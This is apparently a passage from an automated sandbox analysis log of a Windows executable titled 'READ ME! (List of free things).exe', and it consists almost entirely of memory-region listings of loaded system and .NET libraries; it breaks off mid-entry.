# Flog Txt Version 1 # Analyzer Version: 2024.2.1 # Analyzer Build Date: Mar 23 2024 12:02:19 # Log Creation Date: 27.04.2024 09:51:57.354 Process: id = "1" image_name = "read me! (list of free things).exe" filename = "c:\\users\\oqxzraykm\\desktop\\read me! (list of free things).exe" page_root = "0x62589000" os_pid = "0x14d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0xa64" cmd_line = "\"C:\\Users\\OqXZRaykm\\Desktop\\READ ME! (List of free things).exe\" " cur_dir = "C:\\Users\\OqXZRaykm\\Desktop\\" os_username = "PXTHFFRYO7\\OqXZRaykm" bitness = "32" os_groups = "PXTHFFRYO7\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001bd08" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 137 start_va = 0x10000 end_va = 0x69fff monitored = 1 entry_point = 0x4885e region_type = mapped_file name = "read me! (list of free things).exe" filename = "\\Users\\OqXZRaykm\\Desktop\\READ ME! (List of free things).exe" (normalized: "c:\\users\\oqxzraykm\\desktop\\read me! (list of free things).exe") Region: id = 138 start_va = 0x70000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 139 start_va = 0x90000 end_va = 0xacfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 140 start_va = 0xb0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 141 start_va = 0x1b0000 end_va = 0x1b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 142 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 143 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 144 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 145 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 146 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 147 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 148 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 301 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 302 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 303 start_va = 0x400000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 304 start_va = 0x7fffae2a0000 end_va = 0x7fffae304fff monitored = 1 entry_point = 0x7fffae2cbd50 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 305 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 306 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 307 start_va = 0x70000 end_va = 0x7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 308 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 309 start_va = 0x5a0000 end_va = 0x668fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 310 start_va = 0x400000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 311 start_va = 0x4a0000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 312 start_va = 0x80000 end_va = 0x86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 313 start_va = 0x7fffc7bb0000 end_va = 0x7fffc7c3ffff monitored = 0 entry_point = 0x7fffc7bc0880 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 314 start_va = 0x7ff4fdab0000 end_va = 0x7ff4fde8cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\apppatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 315 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 316 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 317 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 318 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 319 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 320 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 321 start_va = 0x770000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 322 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 323 start_va = 0x7fffabe90000 end_va = 0x7fffabf38fff monitored = 1 entry_point = 0x7fffabe98150 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 324 start_va = 0x7fffcb970000 end_va = 0x7fffcb9c4fff monitored = 0 entry_point = 0x7fffcb97a7e0 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 325 start_va = 0x400000 end_va = 0x453fff monitored = 1 entry_point = 0x43885e region_type = mapped_file name = "read me! (list of free things).exe" filename = "\\Users\\OqXZRaykm\\Desktop\\READ ME! (List of free things).exe" (normalized: "c:\\users\\oqxzraykm\\desktop\\read me! (list of free things).exe") Region: id = 326 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 327 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 328 start_va = 0x7fffb4400000 end_va = 0x7fffb4409fff monitored = 0 entry_point = 0x7fffb4401390 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 329 start_va = 0x8b0000 end_va = 0x1376fff monitored = 1 entry_point = 0x8b63c0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 330 start_va = 0x7fffa7500000 end_va = 0x7fffa7fc6fff monitored = 1 entry_point = 0x7fffa75063c0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 331 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 332 start_va = 0x7fffbb230000 end_va = 0x7fffbb245fff monitored = 0 entry_point = 0x7fffbb23c000 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\System32\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\system32\\vcruntime140_clr0400.dll") Region: id = 333 start_va = 0x7fffabdd0000 end_va = 0x7fffabe8cfff monitored = 0 entry_point = 0x7fffabe57db0 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\System32\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\system32\\ucrtbase_clr0400.dll") Region: id = 334 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 335 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 336 start_va = 0x770000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 337 start_va = 0x8a0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 338 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 339 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 340 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 341 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 342 start_va = 0x410000 end_va = 0x43dfff monitored = 0 entry_point = 0x4114d0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 343 start_va = 0x8b0000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 344 start_va = 0x7fffcb940000 end_va = 0x7fffcb96ffff monitored = 0 entry_point = 0x7fffcb9414d0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 345 start_va = 0xab0000 end_va = 0xc30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 346 start_va = 0xc40000 end_va = 0x2040fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 347 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 348 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 349 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 350 start_va = 0x430000 end_va = 0x430fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 351 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 352 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 353 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 354 start_va = 0x7fff47e90000 end_va = 0x7fff47e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47e90000" filename = "" Region: id = 355 start_va = 0x7fff47ea0000 end_va = 0x7fff47eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47ea0000" filename = "" Region: id = 356 start_va = 0x7fff47eb0000 end_va = 0x7fff47f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47eb0000" filename = "" Region: id = 357 start_va = 0x7fff47f40000 end_va = 0x7fff47faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47f40000" filename = "" Region: id = 358 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 359 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 360 start_va = 0x2050000 end_va = 0x224ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 361 start_va = 0x2050000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 362 start_va = 0x2240000 end_va = 0x224ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 363 start_va = 0x2050000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 364 start_va = 0x21b0000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 365 start_va = 0x870000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 366 start_va = 0x2250000 end_va = 0x1a24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002250000" filename = "" Region: id = 367 start_va = 0x1a250000 end_va = 0x1a5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a250000" filename = "" Region: id = 368 start_va = 0x1a5d0000 end_va = 0x1a6e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 369 start_va = 0x1a6f0000 end_va = 0x1a7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a6f0000" filename = "" Region: id = 370 start_va = 0x1a7f0000 end_va = 0x1ab27fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 371 start_va = 0x7fffa5f00000 end_va = 0x7fffa74fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\de013c985ad100d05dc94ec118f77b92\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\de013c985ad100d05dc94ec118f77b92\\mscorlib.ni.dll") Region: id = 372 start_va = 0x7fffcbef0000 end_va = 0x7fffcc018fff monitored = 0 entry_point = 0x7fffcbf16140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 373 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 374 start_va = 0x1ab30000 end_va = 0x1ac02fff monitored = 0 entry_point = 0x1ab4d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 375 start_va = 0x1ab30000 end_va = 0x1ac74fff monitored = 0 entry_point = 0x1ab8a9b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 376 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 377 start_va = 0x7fffc7c60000 end_va = 0x7fffc7cfefff monitored = 0 entry_point = 0x7fffc7c89120 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 378 start_va = 0x1ab30000 end_va = 0x1acdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ab30000" filename = "" Region: id = 379 start_va = 0x7ff4fddf0000 end_va = 0x7ff4fde8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fddf0000" filename = "" Region: id = 380 start_va = 0x7ff4fdde0000 end_va = 0x7ff4fddeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdde0000" filename = "" Region: id = 381 start_va = 0x7fff47fb0000 end_va = 0x7fff4802ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47fb0000" filename = "" Region: id = 382 start_va = 0x7fffabaa0000 end_va = 0x7fffabbeefff monitored = 1 entry_point = 0x7fffabaa1090 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clrjit.dll") Region: id = 383 start_va = 0x870000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 384 start_va = 0x7fffa5280000 end_va = 0x7fffa5ef0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\808887ebadf1a37835b907c866cede3c\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system\\808887ebadf1a37835b907c866cede3c\\system.ni.dll") Region: id = 385 start_va = 0x7fffa4800000 end_va = 0x7fffa5274fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\bd42a6d2da6a5a79a9f5db3fa08a5283\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.core\\bd42a6d2da6a5a79a9f5db3fa08a5283\\system.core.ni.dll") Region: id = 386 start_va = 0x7fffab870000 end_va = 0x7fffaba94fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.visualbasic.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.V9921e851#\\1b297cd8658fe6a76f85d594efee9c8b\\Microsoft.VisualBasic.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.v9921e851#\\1b297cd8658fe6a76f85d594efee9c8b\\microsoft.visualbasic.ni.dll") Region: id = 387 start_va = 0x880000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 388 start_va = 0x880000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 389 start_va = 0x890000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 390 start_va = 0x2150000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 391 start_va = 0x2160000 end_va = 0x216ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 392 start_va = 0x2170000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 393 start_va = 0x2180000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 394 start_va = 0x2190000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 395 start_va = 0x7fff48030000 end_va = 0x7fff4803ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48030000" filename = "" Region: id = 396 start_va = 0x880000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 397 start_va = 0x880000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 398 start_va = 0x1ace0000 end_va = 0x1aebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ace0000" filename = "" Region: id = 399 start_va = 0x21c0000 end_va = 0x2221fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscorrc.dll") Region: id = 400 start_va = 0x880000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 401 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 402 start_va = 0x7fffc9a70000 end_va = 0x7fffc9a87fff monitored = 0 entry_point = 0x7fffc9a74aa0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 403 start_va = 0x7fffc9230000 end_va = 0x7fffc9263fff monitored = 0 entry_point = 0x7fffc9236e70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 404 start_va = 0x7fffc9a90000 end_va = 0x7fffc9a9bfff monitored = 0 entry_point = 0x7fffc9a92200 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 405 start_va = 0x7fffcc090000 end_va = 0x7fffcc7c0fff monitored = 0 entry_point = 0x7fffcc19e6e0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 406 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 407 start_va = 0x880000 end_va = 0x880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 408 start_va = 0x7fffc8320000 end_va = 0x7fffc8aa9fff monitored = 0 entry_point = 0x7fffc84dc050 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 409 start_va = 0x7fffc9b80000 end_va = 0x7fffc9baafff monitored = 0 entry_point = 0x7fffc9b82db0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 410 start_va = 0x7fffc65e0000 end_va = 0x7fffc66d4fff monitored = 0 entry_point = 0x7fffc6622860 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 411 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 412 start_va = 0x890000 end_va = 0x890fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 413 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 414 start_va = 0x2150000 end_va = 0x2150fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002150000" filename = "" Region: id = 415 start_va = 0x2160000 end_va = 0x2163fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 416 start_va = 0x1ab30000 end_va = 0x1ab78fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000001.db") Region: id = 417 start_va = 0x1acd0000 end_va = 0x1acdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001acd0000" filename = "" Region: id = 418 start_va = 0x2170000 end_va = 0x2173fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 419 start_va = 0x1ab80000 end_va = 0x1ac1bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 420 start_va = 0x2180000 end_va = 0x218ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 421 start_va = 0x2190000 end_va = 0x2193fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: 